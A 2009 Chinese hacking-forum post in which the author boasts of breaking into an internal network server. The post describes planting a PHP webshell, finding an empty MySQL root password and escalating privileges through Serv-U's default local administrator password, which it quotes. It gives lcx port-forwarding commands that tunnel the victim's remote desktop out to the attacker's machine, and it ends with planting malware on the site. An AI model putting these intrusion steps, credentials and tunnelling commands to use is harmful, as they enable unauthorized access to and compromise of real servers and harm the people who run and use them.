查看: 10015|回复: 2

再次入侵内网服务器

[复制链接]

梦缘o☆无恒

电梯直达

1^#

发表于 2009-11-29 03:02:30 | 只看该作者回帖奖励

|倒序浏览 |阅读模式

图:再次入侵内网服务器
---------------------------------------------------------------------------
搞了个php的webshell,然后就想提权试试...
这次入侵没有技术可言..就当复习好了......
服务器是NT的装了apache,好像这个51shell加密后的phpspy也有权限了
到它系统目录下面找到了my.ini.装了MYSQL的.然后用户是root密码是空.
然后用php马的执行SQL功能连接它数据库试试,结果失败了.
然后用这个php马自带的扫描工具扫描了一下.发下3306没开但是..
开了21.和43958.ftp上去发现是低版本的...然后..
这个phpspy已经有Serv-U EXP了....当然不用我上传ftp.exe了..
提权就不用说了...就是利用Serv-U的本地用户localadministrator和
它的默认密码#l@$ak#.lk;0@P然后就有administrator权限了....
直接建立了用户230 login in.成功了..但是3389连不上....
webshell里面ipconfig才发现它是内网服务器.......笨得我...............
然后呢..当然是lcx大哥的lcx.exe了........哈哈.......端口重定向............
上传上去lcx -slave 我的IP 监听的端口肉鸡IP 3389
这个命令就是把肉鸡的3389端口定向到我监听的端口..
然后本机lcx -listen 51 2105.......监听51端口..转到本级的2105端口.......
接下来就是修补漏洞了...当然是用UE改serv-u的本地默认密码了...
用webshell上传失败....工具2MB...然后用肉鸡上天空下载3kb/s
无奈了.....然后tftp又是错误Timeout occurred
最后还是本地用20cn的ftp服务器...给肉鸡下载......
完了...就用UE..打开Servudaemon.exe..找#l@$ak#.lk;0@P给它改了..
郁闷的是..改了不能覆盖掉..可能..webshell里面的SERVU EXP还在调用它..
然后就挂马咯........日志就不清理了..因为清理不掉我登陆的那个事件...

收藏0